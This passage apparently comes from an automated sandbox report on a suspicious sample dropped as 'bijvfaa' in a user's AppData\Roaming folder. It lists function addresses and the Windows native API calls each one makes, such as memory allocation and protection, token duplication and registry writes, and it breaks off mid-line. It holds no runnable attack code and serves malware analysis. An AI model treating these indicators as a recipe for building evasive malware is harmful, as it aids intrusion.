                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6746BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,19_2_6746BE9B
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F96E0 ZwFreeVirtualMemory,19_2_673F96E0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,19_2_673B2ED8
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67442EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67442EA3
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E9ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,19_2_673E9ED0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F96D0 ZwCreateKey,19_2_673F96D0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B66D4 RtlInitUnicodeString,ZwQueryValueKey,19_2_673B66D4
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67483EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,19_2_67483EBC
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F96C0 ZwSetInformationProcess,19_2_673F96C0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E4D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,19_2_673E4D3B
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441D43 ZwQueryInformationThread,19_2_67441D43
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67481D55 ZwFreeVirtualMemory,19_2_67481D55
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E1520 RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_673E1520
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9520 ZwWaitForSingleObject,19_2_673F9520
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67476D61 ZwAllocateVirtualMemoryEx,19_2_67476D61
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441D6A ZwWaitForMultipleObjects,19_2_67441D6A
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,19_2_67441570
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441D0B ZwSetInformationProcess,19_2_67441D0B
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9D70 ZwAlpcQueryInformation,19_2_673F9D70
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6746FD22 ZwQueryInformationProcess,RtlUniform,19_2_6746FD22
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488D34 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488D34
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F95B0 ZwSetInformationThread,19_2_673F95B0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9DB0 ZwAlpcSetInformation,19_2_673F9DB0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6746FDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6746FDD3
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B65A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,19_2_673B65A0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9DA0 ZwAlpcSendWaitReceivePort,19_2_673F9DA0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B3591 ZwSetInformationFile,19_2_673B3591
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673CDD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,19_2_673CDD80
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6746BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,19_2_6746BDFA
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67471582 ZwTraceEvent,19_2_67471582
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6747B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6747B581
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B95F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,19_2_673B95F0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F95F0 ZwQueryInformationFile,19_2_673F95F0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9DE0 ZwAssociateWaitCompletionPacket,19_2_673F9DE0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B45D0 RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,19_2_673B45D0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F95D0 ZwClose,19_2_673F95D0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673DEDC4 ZwCancelWaitCompletionPacket,19_2_673DEDC4
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B4DC0 RtlpUnWaitCriticalSection,RtlRaiseStatus,TpWaitForAlpcCompletion,ZwSetEvent,ZwAlpcQueryInformation,19_2_673B4DC0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F95C0 ZwSetEvent,19_2_673F95C0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673DFC39 ZwAssociateWaitCompletionPacket,19_2_673DFC39
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441C49 ZwQueryInformationProcess,19_2_67441C49
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FA420 ZwGetNlsSectionPtr,19_2_673FA420
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67463C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,19_2_67463C60
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F0413 ZwUnmapViewOfSection,19_2_673F0413
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441C76 ZwQueryInformationProcess,19_2_67441C76
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488C75 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488C75
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EAC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,19_2_673EAC7B
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9C70 ZwAlpcConnectPort,19_2_673F9C70
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F5C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,19_2_673F5C70
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673D746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,19_2_673D746D
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67471411 ZwTraceEvent,19_2_67471411
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488C14 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488C14
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B5450 RtlClearThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,19_2_673B5450
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9C40 ZwAllocateVirtualMemoryEx,19_2_673F9C40
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488CD6
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441CE4 ZwQueryInformationProcess,19_2_67441CE4
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_674714FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_674714FB
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_674664FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,19_2_674664FB
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FA480 ZwInitializeNlsFiles,19_2_673FA480
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67433C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,19_2_67433C93
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67474496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,19_2_67474496
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673BF4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,19_2_673BF4E3
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2CDB RtlFreeHeap,ZwClose,ZwSetEvent,19_2_673B2CDB
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67484CAB ZwTraceControl,19_2_67484CAB
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67489CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67489CB3
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673ECCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx,19_2_673ECCC0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B9335 ZwClose,ZwClose,19_2_673B9335
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488B58 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488B58
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67446365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy,19_2_67446365
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67466369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,19_2_67466369
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67448372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,19_2_67448372
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E5306 ZwReleaseKeyedEvent,19_2_673E5306
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B4B00 TpCallbackMayRunLong,ZwSetInformationWorkerFactory,19_2_673B4B00
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9B00 ZwSetValueKey,19_2_673F9B00
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E3B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,19_2_673E3B7A
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2B7E ZwSetInformationThread,ZwClose,19_2_673B2B7E
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAB70 ZwReleaseWorkerFactoryWorker,19_2_673FAB70
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6747131B RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6747131B
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAB60 ZwReleaseKeyedEvent,19_2_673FAB60
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E3B48 ZwClose,ZwClose,19_2_673E3B48
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E4BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,19_2_673E4BAD
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FA3A0 ZwGetCompleteWnfStateSubscription,19_2_673FA3A0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E939F RtlInitializeCriticalSectionEx,ZwDelayExecution,19_2_673E939F
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,19_2_673B2B93
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B23F6 ZwClose,RtlFreeHeap,19_2_673B23F6
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6747138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6747138A
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9BF0 ZwAlertThreadByThreadId,19_2_673F9BF0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673CA3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,19_2_673CA3E0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67471BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67471BA8
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67489BBE RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67489BBE
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,19_2_673B2BC2
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488BB6
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B8239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,19_2_673B8239
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,19_2_67441242
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EB230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,19_2_673EB230
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9A30 ZwTerminateThread,19_2_673F9A30
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673DA229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,19_2_673DA229
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B4A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,19_2_673B4A20
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488A62 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488A62
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B5210 RtlGetCurrentDirectory_U,memcpy,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,19_2_673B5210
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9A00 ZwProtectVirtualMemory,19_2_673F9A00
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,19_2_67488214
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67444A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose,19_2_67444A28
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B9240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,19_2_673B9240
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EE2BB ZwWaitForAlertByThreadId,19_2_673EE2BB
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9AB0 ZwWaitForMultipleObjects,19_2_673F9AB0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441AD6 ZwFreeVirtualMemory,19_2_67441AD6
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488ADD RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488ADD
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B1AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,19_2_673B1AA0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B52A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,19_2_673B52A5
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E5AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,19_2_673E5AA0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,19_2_673B429E
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673ED294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,19_2_673ED294
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAA90 ZwQuerySystemInformationEx,19_2_673FAA90
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EDA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap,19_2_673EDA88
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673D2280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,ZwTerminateProcess,19_2_673D2280
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FB280 ZwWow64DebuggerCall,19_2_673FB280
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9AE0 ZwTraceEvent,19_2_673F9AE0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAAE0 ZwRaiseException,19_2_673FAAE0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673DFAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,ZwTerminateProcess,19_2_673DFAD0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAAC0 ZwQueryWnfStateNameInformation,19_2_673FAAC0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FA130 ZwCreateWaitCompletionPacket,19_2_673FA130
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9920 ZwDuplicateToken,19_2_673F9920
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488966 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488966
                      Source: C:\Users\user\AppDat